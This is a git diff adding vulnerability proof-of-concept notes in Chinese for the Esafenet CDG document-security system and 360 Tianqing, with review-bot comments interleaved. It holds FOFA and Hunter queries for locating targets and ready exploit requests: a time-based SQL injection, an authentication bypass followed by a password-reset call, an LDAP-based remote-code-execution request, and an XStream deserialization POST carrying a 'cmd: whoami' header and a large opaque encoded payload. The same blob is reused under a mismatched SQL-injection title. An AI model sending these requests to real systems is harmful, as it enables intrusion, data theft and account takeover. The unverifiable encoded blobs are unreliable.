FGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNF
PKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHI
LNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILK
CEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1708399929056-295114da-ae8a-4298-b8f5-0b25036708e5.png](./img/YqHsAYGn1uPt10CJ/1708399929056-295114da-ae8a-4298-b8f5-0b25036708e5-830387.png) + + + +> 更新: 2024-04-20 22:01:30 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/np4v5751f729gwwy> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统getAllUsers身份绕过漏洞.md b/亿赛通电子文档安全管理系统getAllUsers身份绕过漏洞.md new file mode 100644 index 0000000..8c9a324 --- /dev/null +++ b/亿赛通电子文档安全管理系统getAllUsers身份绕过漏洞.md 
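Review bot: the request body committed in 360天擎终端安全管理系统loglastsync存在SQL注入漏洞.md is an opaque run of uppercase letters with no statement of its encoding or of what it decodes to, and its visible start (`MEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBH...`) and end (`...BGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK`) are identical to the body of the XStream request in 亿赛通电子文档安全管理系统offlineApp存在xstream反序列化漏洞.md later in this patch. Either the wrong payload was pasted into this SQL-injection write-up or the title does not describe what the request actually does; the author should confirm which, and in either case describe the body in a sentence (its format and the vulnerability class it exercises) rather than committing several kilobytes of unreadable text that a reviewer cannot check against the claimed behaviour or match to a vendor fix.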
@@ -0,0 +1,35 @@ +# 亿赛通电子文档安全管理系统getAllUsers身份绕过漏洞 + + + +## FOFA + +```YAML +body="/CDGServer3/index.jsp" +``` + +## poc + +```java +POST /CDGServer3/openapi/getAllUsers HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Content-Type: application/x-www-form-urlencoded +Content-Length: 27 + +pageSize=10000&pageNumber=1 + + + + +POST /CDGServer3/rpc/userManage/userPwdReset.js HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Content-Length: 12 + +userIds=test +``` + diff --git a/亿赛通电子文档安全管理系统hiddenWatermark任意文件上传漏洞.md b/亿赛通电子文档安全管理系统hiddenWatermark任意文件上传漏洞.md new file mode 100644 index 0000000..33bd4ba Binary files /dev/null and b/亿赛通电子文档安全管理系统hiddenWatermark任意文件上传漏洞.md differ diff --git a/亿赛通电子文档安全管理系统ids存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统ids存在SQL注入漏洞.md new file mode 100644 index 0000000..35f489e --- /dev/null +++ b/亿赛通电子文档安全管理系统ids存在SQL注入漏洞.md 
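Review bot: the second request in the `poc` block of 亿赛通电子文档安全管理系统getAllUsers身份绕过漏洞.md (`POST /CDGServer3/rpc/userManage/userPwdReset.js` with `userIds=test`) is, by its endpoint name, a state-changing operation on a user account, yet the file says nothing about what it does, why it follows the getAllUsers request, or that running it against a live system alters data. The file also lacks the 漏洞简介 and 影响版本 sections the other write-ups in this patch carry, so there is no affected-version range or vendor-fix reference for a defender to check a deployment against. Minor points in the same block: the fence is tagged `java` but holds raw HTTP requests (`http` renders correctly), and both `Host:` headers are empty. The next entry, 亿赛通电子文档安全管理系统hiddenWatermark任意文件上传漏洞.md, is recorded as `Binary files /dev/null and b/... differ`, so a markdown file has been committed in a non-text encoding and cannot be reviewed; re-save it as UTF-8 text.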
@@ -0,0 +1,49 @@ +# 亿赛通电子文档安全管理系统ids存在SQL注入漏洞 + +# 一、漏洞简介 + 亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。亿赛通电子文档安全管理系统ids存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/c0SeDCIhywj7BmwP/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-274143.png) + +# 四、漏洞复现 +```plain +GET /CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3)WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cache-Control: max-age=0 +Connection: close +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Upgrade-Insecure-Requests: 1 +``` + +![1702456515765-85e20e74-35e6-43c1-9535-88b9bb56f52c.png](./img/c0SeDCIhywj7BmwP/1702456515765-85e20e74-35e6-43c1-9535-88b9bb56f52c-105707.png) + +sqlmap + +```plain +GET /CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3)%20 HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cache-Control: max-age=0 +Connection: close +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Upgrade-Insecure-Requests: 1 +``` + +![1702456548688-79eed2f9-fa8a-4c4b-8e7e-61bcda3b85c6.png](./img/c0SeDCIhywj7BmwP/1702456548688-79eed2f9-fa8a-4c4b-8e7e-61bcda3b85c6-737502.png) + + + +> 更新: 2024-04-20 22:01:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tmm1ig5i22zrmpdp> \ No newline at end of file 
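Review bot: the 影响版本 section of 亿赛通电子文档安全管理系统ids存在SQL注入漏洞.md lists only the product name and no vendor advisory or fixed version is cited, so a reader cannot tell whether a given deployment is affected or already patched; add the version range and a fix reference. The injection in the 漏洞复现 request is a time-based `WAITFOR DELAY '0:0:5'` appended to the `ids` parameter, which is worth stating in prose because that delay is the one observable a WAF/IDS rule or an access-log review can key on. Two nits in the same block: the GET carries `Content-Type: application/x-www-form-urlencoded; charset=UTF-8` although it has no body, which is misleading and can be dropped, and the `sqlmap` subsection is a bare request with no sentence saying what it is for.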
diff --git a/亿赛通电子文档安全管理系统logincontroller接口存在远程代码执行漏洞.md b/亿赛通电子文档安全管理系统logincontroller接口存在远程代码执行漏洞.md new file mode 100644 index 0000000..ed33196 --- /dev/null +++ b/亿赛通电子文档安全管理系统logincontroller接口存在远程代码执行漏洞.md @@ -0,0 +1,21 @@ +# 亿赛通电子文档安全管理系统logincontroller接口存在远程代码执行漏洞 + +亿赛通电子文档安全管理系统 /CDGServer3/logincontroller 接口存在远程代码执行漏洞。 + +## fofa + +```yaml +body="/CDGServer3/index.jsp" +``` + +## poc + +```java +POST /CDGServer3/logincontroller HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded +Connection: close + +fromurl=/LdapAjax&token=1&command=testConnection&hosts=ldap://192.168.10.1:1379/CN=account,OU=exp,DC=exp,DC=com&users=account&dns=CN=account,OU=exp,DC=exp,DC=com&dns2=OU=exp,DC=exp,DC=com&type=0&pwds=123456 +``` + diff --git a/亿赛通电子文档安全管理系统offlineApp存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统offlineApp存在xstream反序列化漏洞.md new file mode 100644 index 0000000..f74bbc6 --- /dev/null +++ b/亿赛通电子文档安全管理系统offlineApp存在xstream反序列化漏洞.md 
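Review bot: 亿赛通电子文档安全管理系统logincontroller接口存在远程代码执行漏洞.md consists of one sentence and a request, with no 漏洞简介, 影响版本 or fix reference, so the remote-code-execution claim in the title is backed by nothing a reader can verify; at minimum state the affected version range and the vendor advisory. The request embeds a private address (`ldap://192.168.10.1:1379/...`) that is evidently the author's lab value without being marked as such, and the `Host:` header is empty; replace both with explicit placeholders. As in the getAllUsers file, the block is fenced as `java` although it is an HTTP request.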
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统offlineApp存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统offlineApp存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/Rr2cMZleZrlHwlbu/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-405249.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/offlineApp HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.31.208:8090 +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJ
OAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJ
ACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJ